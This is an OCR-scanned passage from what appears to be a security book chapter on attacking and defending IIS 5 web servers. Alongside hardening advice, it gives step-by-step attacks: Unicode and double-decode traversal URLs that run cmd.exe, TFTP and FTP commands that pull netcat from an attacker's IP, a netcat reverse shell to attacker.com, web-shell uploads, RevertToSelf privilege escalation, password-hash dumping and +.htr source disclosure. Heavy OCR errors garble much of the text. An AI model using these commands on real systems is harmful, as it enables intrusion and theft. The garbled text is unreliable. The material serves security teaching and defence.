wifh our own experiences. 

Install Your Web Folders on a Drive Other than the System Drive As you have seen, canonicalization 
exploits like Unicode are restricted by URL S 5 mtax that currently hasn't implemented the 
ability to jump across volumes. Thus, by moving the IIS 5 Webroot to a volume without 
powerful tools like cmd.exe, such exploits aren't feasible. On IIS 5, the physical location of 
the Webroot is controlled within the Internet Services Manager (iis.msc) by selecting Prop- 
erties of the Default Web Site, choosing the Home Directory tab, and changing the Local 
Path setting. 

Make sure when you copy your Webroots over to the new drive that you use a tool 
like Robocopy from the Windows 2000 Resource Kit, which preserves the integrity of 
NTFS ACLs. Otherwise, the ACLs will be set to the default in the destination, that is. Ev- 
eryone: Full Control! The Robocopy /SEC switch can help you prevent this. 

Always Use NTFS for Web Server Volumes and Set ACLs Conservatively! With FAT and FAT32 
file systems, file and directory-level access control is impossible, and the lUSR account 
will have carte blanche to read and upload files. When configuring access control on 
Web-accessible NTFS directories, use the least privilege principle. IIS 5 also provides the 
IIS Permissions Wizard that walks you through a scenario-based process of setting ACLs. 
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The Permissions Wizard is accessible by right-clicking the appropriate virtual directory 
in the IIS Admin console. 

Move, Rename, or Delete any Command-Line Utilities that Could Assist an Attacker, and/or Set 
Restrictive Permissions on Them Eric Schultze, Program Manager on Microsoft's Security 
Response Team, and David LeBlanc, Senior Security Technologist for Microsoft recom- 
mend af leasf seffing fhe NTFS ACLs on cmd.exe and several ofher powerful execufables 
fo Adminisfrafor and SYSTEM:Full Confrol only. They have publicly demonsfrafed fhis 
simple frick slops mosf Unicode-f5^e shenanigans cold because lUSR no longer has per- 
missions fo access cmd.exe. Schulfze and LeBlanc recommend using fhe builf-in cads fool 
fo sef fhese permissions globally. 

Lef's walk fhrough an example of how cads mighf be used fo sef permissions on exe- 
cutable files in fhe sysfem diredory. Because so many execufable files are in fhe sysfem 
folder, if's easier if you use a simpler example of several files sitting in a diredory called 
fesfl wifh subdirecfory fesf2. Using cads in display-only mode, we can see fhe existing 
permissions on our fesf files are pretty lax: 

C:\>cacls testl /T 

C:\testl Everyone: (01) (CI)F 
C:\testl\testl.exe Everyone:F 
C:\testl\testl.txt Everyone:F 
C:\testl\test2 Everyone: (01) (CI)F 
C:\testl\test2\test2.exe Everyone : F 
C:\testl\test2\test2.txt Everyone : F 

Lef's say you wanf fo change permissions on all execufable files in fesfl and all subdi- 
redories fo Sysfem:Full, Adminisfrafors:Full. Here's fhe command S5mfax using cads: 

C:\>cacls testl\*.Gxe /T /G System:F Administrators : F 

Are you sure (Y/N) ?y 

processed file: C:\testl\testl.exe 

processed file: C:\testl\test2\test2.exe 

Now we run cads again fo confirm our resulfs. Nofe, fhe .fxf files in all subdirecfories 
have fhe original permissions, buf fhe execufable files are now sef more appropriafely: 

C:\>cacls testl /T 

C:\testl Everyone: (01) (CI)F 
C:\testl\testl.exe NT AUTH0RITY\SYSTEM : F 

BUI LTIN\ Administrators : F 
C:\testl\testl.txt Everyone:F 
C:\testl\test2 Everyone: (01) (CI)F 
C:\testl\test2\test2.exe NT AUTH0RITY\SYSTEM : F 

BUI LTIN\ Administrators : F 
C:\testl\test2\test2.txt Everyone : F 
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Applying this example to a typical Web server, a good idea would be to set ACLs on all 
executables in the %systemroot% directory to SystemiFull, Administrators:Full, like so: 

C:\>cacls %systemroot%\* . exe /T /G SystemiF Administrators : F 



This blocks nonadministrative users from using these executables and helps to prevent 
exploits like Unicode that rely heavily on nonprivileged access to these programs. 



TIP 



The Resource Kit xcacis utility is almost exactly the same as cads, but provides some additional capa- 
bilities, including the capability to set special access permissions. You can also use Windows 2000 Security 
Templates to configure NTFS ACLs automatically (see Chapter 16). 



Of course, such execufables may also be moved, renamed, or delefed. This pufs fhem 
ouf of fhe reach of hackers wifh even more finalify. 

Remove the Everyone and Users Groups from Write and Execute ACLs on the Server 

lUSRjnachinename and lWAM_machinename are members of fhese groups. Be exfra sure 
fhe lUSR and IWAM accounfs don'f have wrife access fo any files or direcfories on your 
sysfem — you've seen whaf even a single wrifable direcfory can lead fo! Also, seriously 
scrufinize Execufe permissions for nonprivileged groups and especially don'f allow any 
nonprivileged user fo have bofh wrife and execufe permissions fo fhe same direcfory! 

Know What It Looks Like When You Are/Have Been Under Attack As always, treat incident re- 
sponse as seriously as prevention — especially with fragile Web servers. To identify if 
your servers have been the victim of a Unicode attack, remember the four P's: ports, pro- 
cesses, file system and Registry footprint, and poring over the logs. 

Foundstone provides a great tool called Vision that maps listening ports on a system 
to processes. What's great about Vision is it provides the way to probe or kill processes 
right from the GUI by right-clicking the specific port /process in question. Read more 
about Vision in Chapter 9. 

From a file and Registry perspective, a host of carmed exploits based on the Unicode 
technique are circulating on the Internet. We will discuss files like sensepost.exe, 
unicodeloader.pl, upload.asp, upload.inc, and cmdasp.asp that play central roles in ex- 
ploiting the vulnerability. Although trivially renamed, at least you'll keep the script kid- 
dies at bay. Especially keep an eye out for these files in writable/executable directories 
like /scripts. Some other commonly employed exploits deposit files with names like 
root.exe (a renamed command shell), e.asp, dl.exe, reggina.exe, regit.exe, restsec.exe, 
makeini.exe, newgina.dll, firedaemon.exe, mmtask.exe, sud.exe, and sud.bak. 

In the log department, IIS enters the ASCII representations of the overlong Unicode 
"/" and "\", making it harder to determine if foul play is at work. Flere are some telltale 
entries from actual Web server logs that came from systems compromised by Unicode 
(asterisks equal wildcards): 

GET /scripts/ \ /winnt/system32/cmd. exe /c+dir 200 
GET / scripts/ ../../ winnt / system32 /tftp .exe* 
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GET /naught y_real_ - 404 

GET /scripts/sensepost . exe /c+echo* 

*01if ante%2 0onder%2 0my%2 Obed* 

*sensepost . exe* 

POST /scripts/upload. asp - 200 
POST /scripts/cradasp . asp - 200 

POST /scripts/cmdasp . asp | - | ASP_0113 | Script_timed_out 500 



double Decode File System Traversal 



Popularity: 


9 


Simplicity: 


8 


Impact: 


7 


Risk Rating: 


8 



In May 2001, researchers at NSFocus released an advisory about an IIS vulnerability 
that bore a striking similarity to the Unicode file system traversal issue. Instead of overlong 
Unicode represenfafions of slashes (/ and \), NSFocus discovered fhaf doubly encoded 
hexadecimal characfers also allowed HTTP requesfs fo be consfrucfed fhaf escaped fhe 
normal IIS securify checks and permitted access fo resources oufside of fhe Webroof. For 
example, fhe backslash can be represenfed fo a Web server by fhe hexadecimal nofafion 
%5c (see "Hex-Encoding URLs" in fhe "IIS Hacking Basics" section earlier in fhis chapfer). 
Similarly, fhe % characfer is represenfed by %25. Thus, fhe sfring %255c, if decoded se- 
quenfially fwo times in sequence, franslafes fo a single backslash. 

The key here is fhaf fwo decodes are required and fhis is fhe nafure of fhe problem 
wifh IIS: if performs fwo decodes on HTTP requesfs fhaf fraverse execufable directories. 
This condifion is exploifable in much fhe same way as fhe Unicode hole. 




Microsoft refers to this vuinerabiiity as the “superfiuous decode’’ issue, but we think doubie decode 
sounds a iot nicer. 



The following URL illusfrafes how an anonymous remote attacker can access fhe 
Windows 2000 command shell: 



http :// victim. com/ scripts/ . . %255c . . %255cwinnt /system32/cmd . exe?/ c+dir+c : \ 

Note, fhe inifial virfual directory in fhe requesf musf have Execute privileges, jusf like 
Unicode. One could also use a file fhaf can be redirected fhrough nefcaf (call fhis file 
ddcode.fxf): 

GET /scripts/. .%255c. . %255cwinnt/system32/cmd. exe?/c+dir+c : \ HTTP/1.0 
[carriage return] 

[carriage return] 
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Here's the result of redirecting this file through netcat against a target server: 

C:\>nc -w victim.com 80 < ddecode.txt 

victim.com [192.168.234.222] 80 (http) open 

HTTP/1.1 200 OK 

Server: Microsoft-IIS/5 . 0 

Date: Thu, 17 May 2001 15:26:28 GMT 

Content-Type : application/octet-stream 

Volume in drive C has no label. 

Volume Serial Number is 6839-982F 

Directory of c:\ 



03/26/2001 


08:03p 


<DIR> 


Documents and Settings 


02/28/2001 


ll:10p 


<DIR> 


Inetpub 


04/16/2001 


09:49a 


<DIR> 


Program Files 


05/15/2001 


12 :20p 


<DIR> 


WINNT 




0 File ( s ) 




0 bytes 




5 Dir(s) 


390,264,832 bytes free 



sent 73, rcvd 885: NOTSOCK 



After the discussion of the Unicode exploits in the previous section, we hope the implica- 
tions of this capability are clear. Commands can be executed as lUSR; resources accessible 
to lUSR are vulnerable; and an 5 rwhere write and / or execute privileges accrue to lUSR, 
files can be uploaded fo fhe victim server and executed. Finally, given certain conditions 
to be discussed shortly, complete compromise of fhe vicfim can be achieved. 

Worthy of nofe at this point is that the Unicode and Double Decode attacks are so similar, 
the illegal Unicode or doubly hex-encoded can be used interchangeably in exploits, if fhe 
server hasn't been patched for eifher vulnerabilify. 

Q Double Decode Countermeasures 



Vendor Bulletin: 


MSOl-026 


Bugtraq ID: 


2708 


Fixed in SP: 


3 


Log Signature: 


Y 



Every counfermeasure discussed for the Unicode vulnerability applies to the double 
decode issue as well because they're so similar. Obviously, the Microsoft patch is different. 
See MSOl-026 for fhe specific pafch fo double decode. MSOl-026 is not included in SP2. 



^()T« 



MS01-026 also changes the InProcessIsapiApps Metabase setting so privilege escalation using 
malicious DLLs that call RevertToSelf won’t be run in-process, as discussed within the upcoming 
section on “Escalating Privileges on IIS 5.’’ 
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Interestingly, a clear difference exisfs between the appearance of fhe Unicode and double 
decode exploifs in fhe IIS logs. For example, the double decode attack using %255c: 

http :// victim. com/ scripts/ . . %255c . . %255cwinnt /system32/cmd . exe?/ ctdir+c : \ 

appears in the IIS logs as: 

21:48:03 10.0.2.18 GET /scripts/ .. %5c . . %5cwinnt/system32/cmd. exe 200 

Compared to the following sample Unicode exploit: 

http : II victim . com/ scripts/ . . %c0%af . . / winnt / system32 /cmd . exe?/c+dir+c : \ 

which shows in the IIS logs as 

21:52:40 10.0.2.18 GET /scripts/ ../.. /winnt /system32 /cmd . exe 200 

This enables one to search more easily on the %5c string to identify attempts to abuse 
this vulnerability. 



Writing Files to the Web Server 

If a nonprivileged or anonymous user possesses the capability to write to disk on a Web 
server, serious security breach is usually not far in the offing. Unfortunately, the 
out-of-the-box default NTFS ACLs allow Everyone:Full Control on C:\, C:\Inetpub, 
C:\Inetpub\scripts, and several other directories, making this a real possibility. Vulnera- 
bilities like the Unicode and double decode file system traversal make writing to disk 
nearly trivial, as we describe next. 

Downloading Files Using SMB, FTP, or TFTP 

Assuming an appropriate writable target directory can be identified, techniques for writ- 
ing to it vary depending on what the firewall allows to / from the target Web server. If the 
firewall allows outbound SMB (TCP 139 and/or 445), files can be sucked from a remote 
attackers system using built-in Windows file sharing. If FTP (TCP 21/20) and/or TFTP 
(UDP 69) are available outbound, a common ploy is to use the FTP or TFTP client on the 
target machine to upload files from a remote attacker's system (which is running an FTP 
or TFTP server). Some examples of commands to perform this trick are as follows. 

Uploading netcat using TFTP is simple. First, set up a TFTP server on the attacker's 
system (192.168.234.31, in this example). Then, run the following on the victim using a file 
system traversal exploit like Unicode: 

GET /scripts/. ,%c0%af. . /winnt/system32/tftp . exe? 

"-i"+192 . 168 . 234 . 31+GET+nc . exe C:\nc.exe HTTP/1.0 

Note this example writes netcat to C:\, as it is writable by Everyone by default. Also 
note, if C:\nc.exe already exists, you get an error stating "tftp.exe: can't write to local file 
'C:\nc.exe.'" A successful transfer should return an HTTP 502 Gateway Error with a 
header message like this: "Transfer successful: 59392 bytes in 1 second, 59392 bytes/s." 
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Using FTP is more difficult, but it's more likely to be allowed outbound from the tar- 
get. The goal is first to create an arbitrary file (let's call it ftptmp) on the target machine, 
which is then used to script the FTP client using the -s'.filename switch. The script instructs 
the FTP client to cormect to the attacker's machine and download netcat. Before you can 
create this file, however, you need to overcome one obstacle. 




Redirection of output using “>” isn’t possible using cmd.exe via the Unicode exploit. 



Some clever soul discovered that simply renaming cmd.exe bypasses this restriction! 
So, to create our FTP client script, you must first create a renamed cmd.exe: 



GET /scripts/. .%cO%af. . /winnt /system32 /cmd . exe?+/c+copy 

+c : \winnt\ systems 2 \ cmd . exe+c : \cmdl . exe HTTP/1.0 



Note that we've again written the file to C:\ because Everyone can write there. Now 
you can create our FTP script file using the echo command. The following example desig- 
nates certain arbitrary values required by the FTP client (script filename = ftptmp, user = 
anonymous, password = a@a.com, FTP server IP address = 192.168.2.31). You can even 
launch the FTP client in script mode and retrieve netcat in the same stroke (this example is 
broken into multiple lines because of page width restrictions): 

GET / scripts/ . . %cO%af . . /cmdl . exe?+/ c+echo+anonymous>C : \ftptmp 
&&echo+a@a . com>>C : \ftptmp&&echo+bin>>C : \ftptmp 
&&echo+get+test .txt+C:\nc.exe>>C:\ ftptmp&&echo+bye>>C : \ ftptmp 
&&ftpH — s:C:\ ftptmp+1 92.168.234.31&&deltC:\ ftptmp 



Using echo > file to Create Files 

Of course, if FTP or TFTP aren't available (for example, if they've been removed from the 
server by a wary admin or blocked at the firewall), other mechanisms exist for writing 
files to the target server without having to invoke external client software. As you've 
seen, using a renamed cmd.exe to echo / redirect the data for file line-by-line is a straight- 
forward approach, if a bit tedious. Fortunately for the hacking community, various 
scripts available from the Internet tie all the necessary elements into a nice package that 
automates the entire process and adds some crafty conveniences to boot. Let's check out 
the best ones. 

Roelof Temmingh wrote a Perl script called unicodeloader that uses the Unicode exploit 
and the echo/redirect technique to create two files — upload.asp and upload.inc — that 
can be used subsequently via a browser to upload anything else an intruder might desire 
(he also includes a script called unicodeexecute with the package, but using cmdasp.asp, 
as the following discusses, is easier). 



^OTE 



Unicodeloader.pl is trivially modified to work via the Double Decode Exploit, which is not patched in 
Service Pack 2. 
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Using unicodeloader.pl is fairly straightforward. First, make sure the upload.asp and 
upload.inc files are in the same directory from which unicodeloader.pl is launched. Then, 
identify a writable and executable directory under the Webroot of the target server. The 
following example uses C:\inetpub\scripts, which is both executable and writable by 
Everyone on default Windows 2000 installations. 

C : \ >unicodeloader . pi 

Usage: unicodeloader IP:port webroot 

C : \>unicodeloader . pi victim. com: 80 C:\inetpub\scripts 

Creating uploading webpage on victim.com on port 80. 

The webroot is C:\inetpub\scripts. 

testing directory /scripts/ . . %cO%af . . /winnt/system32/cmd. exe?/c 
farmer brown directory: c:\inetpub\scripts 

'-au* is not recognized as an internal or external command, 
operable program or batch file. 
sensepost.exe found on system 
uploading ASP section: 



uploading the INC section: (this may take a while) 



upload page created. 

Now simply surf to caesars/upload. asp and enjoy. 

Files will be uploaded to C:\inetpub\scripts 

Unicodeloader.pl first copies C:\winnt\system32\cmd.exe to a file named sensepost.exe 
in the directory specified as the Webroot parameter (in our example, C:\inetpub\scripts). 
Again, this is done to bypass the inability of cmd.exe to take redirect (">") via this exploit. 
Sensepost.exe is then used to echo/redirect the files upload.asp and upload.inc line-by-line 
into the Webroot directory (again, C:\inetpub\scripts in our example). 

Once upload.asp and its associated include file are on the victim server, simply surf to 
that page using a Web browser to upload more files using a convenient form, as shown in 
Figure 10-2. 

To gain greater control over the victim server, attackers will probably upload two 
other files of note, using the upload.asp script. The first will probably be netcat (nc.exe). 
Shortly after that will follow cmdasp.asp, written by a hacker named Maceo. This is a 
form-based script that executes commands using the Unicode exploit, again from within 
the attacker's Web browser. Browsing to cmdasp.asp presents an easy-to-use graphical 
interface for executing Unicode commands, as shown in Figure 10-3. 

At this point, it's worthwhile reemphasizing the ease of using either upload.asp or 
cmdasp.asp by simply browsing to them. In our example that used C:\inetpub\scripts as 
the target directory, the URLs would simply be as follows: 

http://victim.com/scripts/upload.asp 
http :/ /victim . com/scripts/cmdasp . asp 
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File : I Browse... | 

Upload the file | 



^ Done 



d 

Internet ^ 



Figure 1 0-2. Viewing the upioad.asp form on the victim server from the attacker’s Web 

browser— additionai fiies can now be convenientiy upioaded at the touch of a button. 




Figure 1 0-3. Browsing cmdasp.asp from an attacker’s system aiiows easy execution of commands 
via forms-based input. Here we have obtained a directory iisting of C:\. 
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With nc.exe uploaded and the capability to execute commands via cmdasp.asp, shovel- 
ing a shell back to the attacker's system is trivial. First, start a netcat listener on the attacker's 
system, like so: 

C:\>nc -1 -p 2002 

Then, use cmdasp.asp to shovel a netcat shell back to the listener by entering the following 
command in the form and pressing Run: 

c:\inetpub\scripts\nc.exe -v -e cmd.exe attacker.com 2002 

And, voila, looking af our command window running the netcat listener on port 2002 in 
Figure 10-4, you see a command shell has been shoveled back to the attacker's system. 
We've run ipconfig in this remote shell to illustrate the victim machine is dual-homed on 
what appears to be an internal network — ^jackpot for fhe attacker! 



^ D:\test\cmd.exe - nc -1 -p 2002 




X 


D:\test>nc -1 -p 2002 




- 


Microsoft Windows 2000 IVersion 5.00.21951 
(C) Copyright 1985-1999 Microsoft Corp. 




-1 


C : \WINNT\system32>ipconf ig 
ipconfig 






Windows 2000 IP Configuration 






Host Name 


victim 




Primary DNS Suffix 


victim.com 




IP Routing Enabled 


Ves 




Ethernet adapter Local Area Connection: 






Connection-specific DNS Suffix 


victim.com 




IP Address 


192. 168. 200. U 




Ethernet adapter Local Area Connection 2: 






Connection-specific DNS Suffix 


internal . org 




IP Address 


172.16.210.105 




DNS Servers 


172.16.210.6 




C:\WINNT\system32>_ 




d 


m 1 3 





Figure 1 0-4. A command shell shoveled via netcat from the victim system showing the output of 
ipconfig run on the remote machine 
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The insidious thing about the netcat shoveled shell just illustrated is the attacker can 
determine what outbound port to cormect with. Typically, router or firewall rules allow 
outbound cormections from internal host on nonprivileged ports (> 1024), so this attack 
has a high chance of success using one of those ports even if TCP 80 is fhe only inbound 
traffic allowed to the victim Web server because all preliminary steps in the attack operate 
over TCP 80. 

One remaining hurdle remains for the attacker to b 5 ^ass. Even though an interactive 
command shell has been obtained, it's running in the context of a low-privileged user (eifher 
the T[JSR_inachinename or IW AM_machinename account, depending on the configuration 
of the server). Certainly at this point, the attacker could do a great deal of damage, even 
with lUSR privileges. The attacker could read sensitive data from the system, cormect to 
other machines on internal networks (if permissible as lUSR), potentially create denial of 
service situations, and/or deface local Web pages. However, fhe coup de grace for fhis 
sysfem would be to escalate to one of fhe most highly privileged accounts on the machine. 
Administrator or SYSTEM. We talk about how to do that next. 



Escalating Privileges on IIS 5 

As you saw in Chapter 6, good escalation exploits on Windows 2000 require interactive 
privileges. This restricts the effectiveness of exploifs like PipeUp Admin, and netddemsg 
remofely againsf IIS 5. 




On IIS 4, remote privilege escalation exploits exist to add lUSR to Administrators and completely own the 
system, even under SP6a. Aren’t you glad you upgraded to Windows 2000? You did upgrade, didn’t you? 



One potential exploit alluded to in Chapter 6 was the use of RevertToSelf calls within 
and IS API DLL to escalate lUSR to SYSTEM. If an attacker can upload or find an IS API 
DLL that calls RevertToSelf API on an IIS 5 server and execute it, they might be able to 
perform this feat. Given tools like unicodeloader.pl and a writable, executable directory, 
remotely uploading and launching an ISAPI DLL doesn't seem too far-fetched, either. 
This would seem to be exactly what's needed to drive a tyq^ical Unicode attack to complete 
system compromise. 

However, IIS 5's default configuration makes this approach difficult (another good 
reason to upgrade from NT 4!). To explain why, we firsf need to delve into a little back- 
ground on IIS's processing model. Bear with us; the result is worth it. 

The IIS process (inetinfo.exe) runs as LocalSystem and uses impersonation to service 
requests (most other commercial Web servers run as something other than the most privi- 
leged user on the machine, according to best practices. Reportedly, IIS 6 can run as alter- 
native usrs). lUSR is used for anonymous requesfs. 

The ReverfToSelf API call made in an ISAPI DLL can cause commands fo be run as 
SYSTEM. In essence, ReverfToSelf asks fhe current thread to "revert" from lUSR confext 
fo the context under which inetinfo itself runs — SYSTEM. 
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Actually, it's a little more complicated than that. IS API extensions are wrapped in the 
Web Application Manager (WAM) object, which can run within the IIS process or not. 
Running "out-of-process" extracts a slight performance hif, buf prevents unruly ISAPI 
applications from crashing IIS process and is, fherefore, regarded as a more robusf way fo 
run ISAPI applications. Alfhough confrived fo boosf performance, inferesting implicafions 
for security arise from this: 

▼ If run in-process, WAM runs within IIS process (inetinfo.exe) and RevertToSelf 
gets SYSTEM. 

▲ If run ouf-of-process, WAM runs within a separate process (mts.exe) and 
RevertToSelf gefs fhe IWAM user, which is only a guesf. 



This setting is controlled via the IIS Admin tool, which is found under Properties of a 
Web Sife, on fhe Home Direcfory tab, under Application Protection. IIS 5 sets this param- 
eter to Medium out-of-the-box, which runs ISAPI DLLs out-of-process (Low would run 
fhem in-process). 

Thus, privilege escalation via ReverfToSelf would seem impossible under IIS 5 de- 
faulf settings — ISAPI applications run out-of-process, and RevertToSelf gets the IWAM 
user, which is only a guest. Things are not quite what they seem, however, as we will 
demonstrate next. 

/ 

Exploiting RevertToSelf with InProcessIsapiApps 



Popularity: 


7 


Simplicity: 


5 


Impact: 


10 


Risk Rating: 


7 



In February 2001, security programmer Oded Horovitz found an inferesting mecha- 
nism for bypassing the Application Protection setting, no matter what its configuration. 
While examining the IIS configuration database (called the Metabase), he noted the fol- 
lowing key: 

LM/W3SVC/ InProcessIsapiApps 



Atributes: Inh(erit) 

User Type : Server 
Data Type: MultiSZ 

Data : 

C : \WINNT \ Systems 2 \idq. dll 
C : \WINNT\System32\inetsrv\httpext . dll 
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C : \WINNT\System32\inetsrv\httpodbc . dll 
C : \WINNT \ Systems 2 \inetsrv\s sine . dll 
C : \WINNT\System32\msw3prt . dll 

C:\Program FilesXCommon Files\Microsoft Shared\Web Server 
Extensions\ 40\isapi\_vti_aut \author . dll 
C:\Program FilesXCommon Files\Microsoft Shared\Web Server 
Extensions\40\isapi\_vti_adm\admin . dll 
C:\Program FilesXCommon Files\Microsoft Shared\Web Server 
Extensions\40\isapi\shtml . dll 

Rightly thinking he had stumbled on special built-in applications that always run in-pro- 
cess (no matter what other configuration), Horovitz wrote a proof-of-concept IS API DLL 
that called RevertToSelf and named it one of fhe names specified in fhe Mefabase listing 
previously shown (for example, idq.dll). Horovifz builf furfher funcfionalify info fhe 
DLL fhaf added fhe currenf user fo fhe local Adminisfrafors group once SYSTEM confexf 
had been obfained. 

Sure enough, fhe fechnique worked. Furfhermore, he nofed fhe false DLL didn'f have 
fo be copied over fhe "real" exisfing builf -in DLL — simply by placing if in any execufable 
directory on fhe viefim server and execufing if via fhe browser anonymously, lUSR or 
IWAM was added fo Adminisfrafors. Horovifz appeared fo have achieved fhe vaunted 
goal: remofe privilege escalation on IIS 5. Dutifully, he approached Microsoff and in- 
formed fhem, and fhe issue was pafehed in MSOl-026 (posf-SP2) and made public in fhe 
summer of 2001. 

Continuing wifh our previous example, an attacker could upload jusf such a rogue 
ISAPI DLL fo C:\inefpub\scripfs using upload. asp, and fhen execute if via Web browser 
using fhe following URL: 

http : / / victim . com/scripts/idq . dll 

The resulting oufpuf is shown in Figure 10-5. l\JSR_machinename has been added fo 
Adminisfrafors. 

One final hurdle had fo be overcome fo make fhis a practical exploif. Even fhough fhe 
lUSR accounf has been added fo Adminisfrafors, all currenf processes are running in fhe 
confexf of fhe lUSR b^ore if was escalated. So, alfhough lUSR is a member of Adminisfra- 
fors, if cannof exercise Adminisfrafor privileges yef. This severely limifs fhe exfenf of fur- 
fher penefrafion because lUSR cannof nm common posf-exploifafion fools like pwdump2, 
which require Adminisfrafor privileges (see Chapter 8). To exercise ifs newfound power, 
one of two fhrngs musf occur: lUSR's token needs fo be updated fo include fhe Adminisfra- 
for's SID or fhe Web server process needs fo be resfarfed. 

JD Glaser of Foundsfone extended Horovifz's inifial work so lUSR's adminisfrafive 
privileges are immediafely aefivafed by creating a new token for lUSR and changing fhe 
currenf process fo use fhe new foken. The extended DLL can be rim in fhe same way, buf 
wifh a hailing question mark (?): 

http : / /victim . com/scripts/idq .dll? 
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Figure 10-5. Calling a specially crafted ISAPI application that invokes RevertToSelf escalates 
lUSR to local Administrators 



The Web browser continues to process and no results are visible, but the damage has 
been done. Now when a netcat shell is shoveled back, even though it's still running in the 
context of lUSR, lUSR is now a member of Adminisfrafors and can rim privileged fools 
like pwdump2. Game over. 

C:\>nc -1 -p 2002 

Microsoft Windows 2000 [Version 5.00.2195] 

(C) Copyright 1985-1999 Microsoft Corp. 

C : \WINNT\system32>net localgroup administrators 

net localgroup administrators 
Alias name administrators 

Comment Administrators have complete and unrestricted access 

to the computer/domain 

Members 



Administrator 
Domain Admins 
Enterprise Admins 
IUSR_CAESARS 

The command completed successfully. 

C : \WINNT\system32>pwdump2 
Administrator : 500 : aad3b435b5140fetc . 
IUSR_TRINITY7 : 1004 : 6ad27a53b452fetc . 
etc . 
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Q RevertToSelf and InProcessISapiApps Countermeasures 



Vendor Bulletin: 


MSOl-026 


Bugtraq ID: 


NA 


Fixed in SP: 


3 


Log Signature: 


Y 



Consider these few things when trying to defend against attacks like the one conceived 
by Horovitz and JD. 

Apply the Patch in MS01 -026 Although Microsoft doesn't state it explicitly, MSOl-026 
changes the InProcessIsapiApps Metabase settings so they refer fo explicit files rafher than 
relative filenames. This can prevenf the use of RevertToSelf calls embedded in Trojan ISAPI 
DLLs of fhe same name from running in-process, fhus escalating to LocalSystem privileges. 
This is a post-SP2 Hotfix, and is not included with SP2. This patch will also be included in 
any subsequent "roll-up" packages for IIS due out from Microsoft (at press time, a roU-up 
security package was available in MSOl-026). RoU-up packages include all the previously 
released Hotfixes for a given producf. 

Scrutinize Existing ISAPI Applications for Calls to RevertToSelf, and Expunge Them This can help 
prevent them from being used to escalate privilege as previously described. Use the 
dumpbin tool included with many Win32 developer tools to assist in this, as shown in the 
following example using IsapiExt.dll: 

dumpbin /imports IsapiExt.dll I find "RevertToSelf" 

Source Code Revelation Attacks 

Although seemingly less devastating than buffer overflow or file system traversal ex- 
ploits, source code revelation attacks can be just as damaging. If a malicious hacker can 
get an unauthorized glimpse at the source code of sensitive scripts or other application 
support files on your Web server, they are usually mere footsteps away from compromising 
one of the systems in your environment. 

Source code revelation vulnerabilities result from a combination of two factors: 

T Bugs in IIS 

▲ Poor Web programming practices 

We've already noted that IIS has a history of problems that result in inappropriate ex- 
posure of scripf files or other ostensibly private data (::$DATAS, showcode.asp). We dis- 
cuss several of fhese issues in fhis section. These flaws are compounded greafly by Web 
developers who hard-code sensitive information in fhe source code of their ASP scripts or 
global. asa files. The classic example of this is the SQL sa account password being written 
in a connect string within an ASP script that performs back-end database access. 
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Most Web developers assume such information will never be seen on the client side 
because of the way IIS is designed to differentiate between file fypes by extension. For ex- 
ample, .htm files are simply refumed fo clienf browser, buf .asp files are redirected to a 
processing engine and executed server-side. Only the resulting output is sent to the client 
browser. Thus, the source code of fhe ASP should never reach fhe clienf. 

Problems can arise, however, when a request for an Active Server file isn'f passed di- 
recfly fo fhe appropriafe processor, buf rather is intercepted by one of fhe numerous other 
processing engines that ship with IIS. These other engines are also ISAPl DLLs. Some 
prominent ISAPl extensions to IIS include ISM, Webhits, WebDAV, and coming soon to 
future versions of IIS, Simple Objecf Access Protocol (SOAP). Some of fhese ISAPl DLLs 
have flaws thaf cause fhe source code of fhe ASP scripf fo be refumed fo fhe clienf rafher 
fhan execufed server side. Invoking one of these DLLs is as simple as requesting a file 
wifh fhe appropriate extension (for example, .hfr) or supplying the appropriate syntax in 
the HTTP request. Currently, the most dangerous vulnerabilities based on this issue are 
(with associated ISAPl DLLs): 

▼ +.htr (ism.dll) 

■ Webhits (webhits.dll) 

■ Translate: f (WebDAV, httpext.dll) 

▲ WebDAV directory listing (httpext.dll) 

Now that we've discussed the theory behind such vulnerabilities, we'll talk about 
each specific exploif in more detail, along with countermeasures for all of fhem. 



V + 



htr 



Popularity: 


9 


Simplicity: 


9 


Impact: 


4 


Risk Rating: 


8 



The +.hfr vulnerability is a classic example of source code revelation that works against 
IIS 4 and 5. By appending + .htr to an active file request, IIS 4 and 5 serve up fragments of the 
source data from fhe file rafher than executing it. This is an example of a misinterpretation 
by an ISAPl extension, ISM.DLL. The .htr extension maps files to ISM.DLL, which serves 
up the file's source by misfake. Here's a sample file called hfr.txt fhaf you can pipe fhrough 
netcaf fo exploif this vulnerability — ^note the +.htr appended to the request: 

GET /sitel /global . asa+ . htr HTTP/1.0 
[CRLF] 

[CRLF] 
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Piping through netcat connected to a vulnerable server produces the following results: 



C:\>nc -w www.victim.ccan 80 < htr.txt 

www.victim.com [10.0.0.10] 80 (http) open 

HTTP/1.1 200 OK 

Server: Microsoft-IIS/5 . 0 

Date: Thu, 25 Jan 2001 00:50:17 GMT 

<! — filename = global. asa - -> 

( "Prof iles_Connect St ring" ) = "DSN=prof iles; UID=Company_user; Password=secret " 

( "DB_ConnectString" ) = "DSN=db; UID=Company_user ; Password=secret " 

{ "PHFConnectionString" ) = "DSN=phf ; UID=sa; PWD=" 

( "SiteSearchConnectionString" ) = "DSN=SiteSearch; UID=Company_user; Password=simple" 



( "Connectionstring" ) 
( "eMail_pwd" ) 
("LDAPServer") 
("LDAPUserlD") 
("LDAPPwd") 



= "DSN=Company; UID=Company_user; PWD=guessme" 
= "sendaemon" 

= "LDAP : //directory . Company . com: 389" 

= "cn=Directory Admin" 

= "slapdme" 



As you can see in the previous example, the global.asa file, which isn't usually sent to 
the client, gets forwarded when +.htr is appended to the request. You can also see this 
particular server's development team has committed the classical error of hard-coding 
nearly every secret password in the organization within the global.asa file. Ugh. 




To exploit this vulnerability, zeros would have to be in fortuitous memory locations on the server. Multi- 
ple malicious requests usually produce this situation but, occasionally, -r.htr won’t work because of this 
limitation. 



Patching this vulnerability isn't enough, either. Microsoft released two separate 
patches for issues related to .htr file requests, and then was forced to issue a third when a 
variation on the -r.htr attack was found to work on the patched servers. The variation 
prepends a %3f to the -r.htr of the original exploit. Here's a sample file that can be redi- 
rected to netcat: 

GET /sitel/global.asa%3f+.htr HTTP/1.0 
[CRLF] 

[CRLF] 

Redirecting this file through netcat can achieve the same source code revelation results 
against servers that have been patched with MSOO-31 and/or MSOO-044. 
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O +-htr Countermeasures 



Vendor Bulletin: 


MSOl-004 


Bugtraq ID: 


2313 


Fixed in SP: 


3 


Log Signature: 


Y 



Countermeasure number one for +.htr is repeated throughout this chapter: don't 
hard-code private data in Active Server files! Obviously, if nothing of such a sensitive na- 
ture is written to the global. asa file, much of the problem can be alleviated. 

